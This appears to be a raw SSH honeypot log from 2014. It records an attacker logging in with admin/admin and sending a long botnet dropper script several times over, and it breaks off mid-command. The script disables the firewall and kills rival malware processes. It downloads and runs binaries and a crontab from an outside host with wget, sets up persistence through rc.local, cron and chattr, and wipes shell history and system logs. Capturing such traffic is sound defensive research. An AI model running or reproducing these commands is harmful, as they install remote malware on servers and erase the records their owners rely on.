/etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] Opening TTY log: log/tty/20141017-035505-4442.log 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] Running exec command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] CMD: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] Command not found: /etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] Command found: rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT k 2014-10-17 03:55:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] sending close 0 2014-10-17 03:55:05+0100 [SSHService ssh-userauth on HoneyPotTransport,6,122.225.109.214] login attempt [admin/admin] succeeded 2014-10-17 03:55:05+0100 [SSHService ssh-userauth on HoneyPotTransport,6,122.225.109.214] admin authenticated with keyboard-interactive 2014-10-17 03:55:05+0100 [SSHService ssh-userauth on HoneyPotTransport,6,122.225.109.214] starting service ssh-connection 2014-10-17 03:55:06+0100 [SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] got channel session request 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] channel open 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,5,122.225.109.214] remote close 2014-10-17 03:55:06+0100 [HoneyPotTransport,5,122.225.109.214] connection lost 2014-10-17 03:55:06+0100 [HoneyPotTransport,7,122.225.109.214] NEW KEYS 2014-10-17 03:55:06+0100 [HoneyPotTransport,7,122.225.109.214] starting service ssh-userauth 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] executing command "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf dir atdd.* cd /etc;rm -rf dir ksapd.* cd /etc;rm -rf dir kysapd.* cd /etc;rm -rf dir sksapd.* cd /etc;rm -rf dir skysapd.* cd /etc;rm -rf dir xfsdx.* cd /etc;rm -rf dir sfewfesfs cd /etc;rm -rf dir gfhjrtfyhuf cd /etc;rm -rf dir rewgtf3er4t cd /etc;rm -rf dir fdsfsfvff cd /etc;rm -rf dir smarvtd cd /etc;rm -rf dir whitptabil cd /etc;rm -rf dir gdmorpen cd /etc;rm -rf dir sfewfesfs.* cd /etc;rm -rf dir gfhjrtfyhuf.* cd /etc;rm -rf dir rewgtf3er4t.* cd /etc;rm -rf dir fdsfsfvff.* cd /etc;rm -rf dir smarvtd.* cd /etc;rm -rf dir whitptabil.* cd /etc;rm -rf dir gdmorpen.* cd /etc;rm -rf dir nhgbhhj.* cd /tmp;rm -rf dir 1.* cd /tmp;rm -rf dir 2.* cd /tmp;rm -rf dir 3.* cd /tmp;rm -rf dir 4.* cd /tmp;rm -rf dir 5.* cd /tmp;rm -rf dir jdhe cd /tmp;rm -rf dir jdhe.* cd /var/spool/cron; rm -rf dir root.* cd /var/spool/cron; rm -rf dir root cd /var/spool/cron/crontabs; rm -rf dir root.* cd /var/spool/cron/crontabs; rm -rf dir root cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root yes|mv /tmp/root /var/spool/cron yes|mv /tmp/root /var/spool/cron/crontabs cd /tmp;wget -c http://www.frade8c.com:9162/1 cd /tmp;wget -c http://www.frade8c.com:9162/2 cd /tmp;wget -c http://www.frade8c.com:9162/3 cd /tmp;wget -c http://www.frade8c.com:9162/4 cd /tmp;wget -c http://www.frade8c.com:9162/5 cd /tmp;wget -c http://www.frade8c.com:9162/jdhe cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff cd /etc;wget -c http://www.frade8c.com:9162/smarvtd cd /etc;wget -c http://www.frade8c.com:9162/whitptabil cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj cd /etc;wget -c http://www.frade8c.com:9162/byv832 cd /tmp;chmod 7777 1 cd /tmp;chmod 7777 2 cd /tmp;chmod 7777 3 cd /tmp;chmod 7777 4 cd /tmp;chmod 7777 5 cd /tmp;chmod 7777 jdhe cd /etc;chmod 7777 nhgbhhj cd /etc;chmod 7777 byv832 cd /etc;chmod 7777 sfewfesfs cd /etc;chmod 7777 gfhjrtfyhuf cd /etc;chmod 7777 rewgtf3er4t cd /etc;chmod 7777 fdsfsfvff cd /etc;chmod 7777 smarvtd cd /etc;chmod 7777 whitptabil cd /etc;chmod 7777 gdmorpen cd /tmp;chmod 7777 nhgbhhj cd /tmp;chmod 7777 byv832 cd /tmp;chmod 7777 sfewfesfs cd /tmp;chmod 7777 gfhjrtfyhuf cd /tmp;chmod 7777 rewgtf3er4t cd /tmp;chmod 7777 fdsfsfvff cd /tmp;chmod 7777 smarvtd cd /tmp;chmod 7777 whitptabil cd /tmp;chmod 7777 gdmorpen cd /tmp;./1 cd /tmp;./2 cd /tmp;./3 cd /tmp;./4 cd /tmp;./5 cd /tmp;./jdhe nohup /etc/sfewfesfs > /dev/null 2>&1& nohup /etc/gfhjrtfyhuf > /dev/null 2>&1& nohup /etc/rewgtf3er4t > /dev/null 2>&1& nohup /etc/fdsfsfvff > /dev/null 2>&1& nohup /etc/smarvtd > /dev/null 2>&1& nohup /etc/whitptabil > /dev/null 2>&1& nohup /etc/gdmorpen > /dev/null 2>&1& nohup /etc/nhgbhhj > /dev/null 2>&1& nohup /etc/byv832 > /dev/null 2>&1& nohup /tmp/sfewfesfs > /dev/null 2>&1& nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1& nohup /tmp/rewgtf3er4t > /dev/null 2>&1& nohup /tmp/fdsfsfvff > /dev/null 2>&1& nohup /tmp/smarvtd > /dev/null 2>&1& nohup /tmp/whitptabil > /dev/null 2>&1& nohup /tmp/gdmorpen > /dev/null 2>&1& nohup /tmp/nhgbhhj > /dev/null 2>&1& nohup /tmp/byv832 > /dev/null 2>&1& echo "cd /tmp;./sfewfesfs" >> /etc/rc.local echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local echo "cd /tmp;./smarvtd" >> /etc/rc.local echo "cd /tmp;./whitptabil" >> /etc/rc.local echo "cd /tmp;./gdmorpen" >> /etc/rc.local echo "cd /etc;./sfewfesfs" >> /etc/rc.local echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local echo "cd /etc;./fdsfsfvff" >> /etc/rc.local echo "cd /etc;./smarvtd" >> /etc/rc.local echo "cd /etc;./whitptabil" >> /etc/rc.local echo "cd /etc;./gdmorpen" >> /etc/rc.local echo "unset MAILCHECK" >> /etc/profile cd /etc;chattr +i sfewfesfs rm -rf /root/.bash_history touch /root/.bash_history history -r cd /var/log > dmesg cd /var/log > auth.log cd /var/log > alternatives.log cd /var/log > boot.log cd /var/log > btmp cd /var/log > cron cd /var/log > cups cd /var/log > daemon.log cd /var/log > dpkg.log cd /var/log > faillog cd /var/log > kern.log cd /var/log > lastlog cd /var/log > maillog cd /var/log > user.log cd /var/log > Xorg.x.log cd /var/log > anaconda.log cd /var/log > yum.log cd /var/log > secure cd /var/log > wtmp cd /var/log > utmp cd /var/log > messages cd /var/log > spooler cd /var/log > sudolog cd /var/log > aculog cd /var/log > access-log cd /root > .bash_history history -c" 2014-10-17 03:55:06+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,122.225.109.214] exec command: "/etc/init.d/iptables stop echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "nameserver 8.8.4.4" >> /etc/resolv.conf apt-get -y install wget yum -y install wget chmod 7777 / etc killall -9 .IptabLes killall -9 nfsd4 killall -9 profild.key cd /etc;rm -rf dir fake.cfg killall -9 nfsd killall -9 DDosl killall -9 lengchao32 killall -9 b26 killall -9 khelper killall -9 Bill killall -9 n26 killall -9 007 killall -9 codelove killall -9 32 killall -9 m32 killall -9 m64 killall -9 64 killall -9 83BOT killall -9 82BOT killall -9 dos64 killall -9 dos32 killall -9 new6 killall -9 new4 killall -9 node24 killall -9 mimi killall -9 nodeJR-1 killall -9 freeBSD killall -9 ksapdd killall -9 106 killall -9 09 killall -9 xsw killall -9 syslogd killall -9 skysapdd killall -9 cupsddd killall -9 ksapd killall -9 atddd killall -9 xfsdxd killall -9 sfewfesfs killall -9 gfhjrtfyhuf killall -9 rewgtf3er4t killall -9 fdsfsfvff killall -9 smarvtd killall -9 whitptabil killall -9 gdmorpen cd /etc;chattr -i 66 cd /root; chmod 7777 / etc killall -9 minerd killall -9 syn killall -9 joudckfr killall -9 www killall -9 log killall -9 .IptabLes killall -9 .IptabLex killall -9 .Mm2 killall -9 acpid killall -9 m64 killall -9 ./QQ killall -9 aabb killall -9 g3 killall -9 S99local killall -9 3 killall -9 pm killall -9 qweasd killall -9 tangtang killall -9 imap-login killall -9 xudp killall -9 sshpa killall -9 008 killall -9 txma killall -9 mrdos64.b00 killall -9 mrdos32.b00 killall -9 kkpklp killall -9 kiilp killall -9 xin1 killall -9 jibateng killall -9 syscore.sh killall -9 syscore.sh killall -9 syscore.sh killall -9 .mimeo killall -9 .mimeo killall -9 .mimeo killall -9 .mimeop killall -9 .task1 killall -9 .mimeop killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex killall -9 .IptabLes killall -9 .IptabLex cd /root;rm -rf dir nohup.out cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsddd.* cd /etc;rm -rf dir atddd.* cd /etc;rm -rf dir ksapdd.* cd /etc;rm -rf dir kysapdd.* cd /etc;rm -rf dir sksapdd.* cd /etc;rm -rf dir skysapdd.* cd /etc;rm -rf dir xfsdxd.* cd /etc;rm -rf dir fake.cfg cd /etc;rm -rf dir cupsdd.* cd /etc;rm -rf 